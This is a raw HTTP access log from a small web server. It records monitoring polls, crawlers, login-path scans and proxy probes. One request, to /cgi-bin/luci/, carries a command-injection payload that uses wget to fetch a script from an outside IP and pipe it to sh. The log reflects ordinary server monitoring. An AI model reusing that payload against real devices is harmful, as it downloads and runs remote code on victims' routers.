185.191.126.213 - - [03/Oct/2024:22:49:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:49:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:22:50:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:22:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:22:51:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.79 - - [03/Oct/2024:22:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:51:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:22:52:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:22:52:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:53:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:22:54:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:22:54:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:54:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:22:55:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:22:55:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.32.39.40 - - [03/Oct/2024:22:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
212.91.246.72 - - [03/Oct/2024:22:56:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:57:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:22:58:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:58:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:58:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:59:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:22:59:58 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:23:00:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:01:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:23:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:23:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Oct/2024:23:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:02:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [03/Oct/2024:23:03:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2024:23:03:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:23:04:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [03/Oct/2024:23:04:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:23:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:05:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:05:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:23:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.128.37 - - [03/Oct/2024:23:06:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:23:06:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:07:01 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:23:07:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:23:08:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:08:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.152.43 - - [03/Oct/2024:23:09:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Oct/2024:23:09:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:10:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:11:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:11:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:12:58 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:23:12:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Oct/2024:23:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:23:14:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:15:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:17:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:17:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:18:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:19:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:19:08 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:23:19:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:20:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:21:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:22:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.103 - - [03/Oct/2024:23:22:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.103 - - [03/Oct/2024:23:22:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:23:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:24:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:24:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:25:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:26:00 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:23:26:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:27:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:28:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.59 - - [03/Oct/2024:23:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [03/Oct/2024:23:29:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:23:29:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:30:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:23:30:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:31:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:31:41 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:23:32:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.38.246.117 - - [03/Oct/2024:23:32:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:23:33:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:23:33:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:23:33:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:34:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:35:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:23:35:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [03/Oct/2024:23:35:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.179.107.58 - - [03/Oct/2024:23:35:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:36:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:37:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:37:28 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
95.214.55.43 - - [03/Oct/2024:23:37:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:23:38:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:39:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [03/Oct/2024:23:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:23:40:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:41:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:42:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:42:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:43:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:23:43:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:44:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.179.107.58 - - [03/Oct/2024:23:44:17 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [03/Oct/2024:23:44:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:45:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:23:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:46:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.249.48.232 - - [03/Oct/2024:23:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Oct/2024:23:47:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:48:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.75 - - [03/Oct/2024:23:48:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.75 - - [03/Oct/2024:23:48:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.179.107.58 - - [03/Oct/2024:23:48:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:49:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [03/Oct/2024:23:49:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2024:23:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:23:50:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.179.107.58 - - [03/Oct/2024:23:50:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/Oct/2024:23:51:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:52:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:53:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:23:54:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:54:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:55:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:23:57:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.133.162 - - [03/Oct/2024:23:57:45 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2024:23:58:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:23:58:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:23:59:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2024:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.177.211 - - [04/Oct/2024:00:00:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2024:00:01:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2024:00:02:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2024:00:03:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Oct/2024:00:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2024:00:04:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2024:00:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.133.162 - - [04/Oct/2024:00:05:51 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2024:00:06:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Oct/2024:00:06:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [04/Oct/2024:00:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Oct/2024:00:07:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [04/Oct/2024:00:08:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2024:00:08:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [04/Oct/2024:00:08:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Oct/2024:00:09:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [04/Oct/2024:00:09:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.162 - - [04/Oct/2024:00:09:44 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2024:00:10:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2024:00:11:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [04/Oct/2024:00:11:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Oct/2024:00:12:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [04/Oct/2024:00:12:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.133.162 - - [04/Oct/2024:00:12:49 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
134.122.108.60 - - [04/Oct/2024:00:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
179.43.133.162 - - [04/Oct/2024:00:14:28 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
31.134.204.36 - - [04/Oct/2024:00:14:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
185.191.126.213 - - [04/Oct/2024:00:14:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [04/Oct/2024:00:16:26 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
95.214.55.138 - - [04/Oct/2024:00:18:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
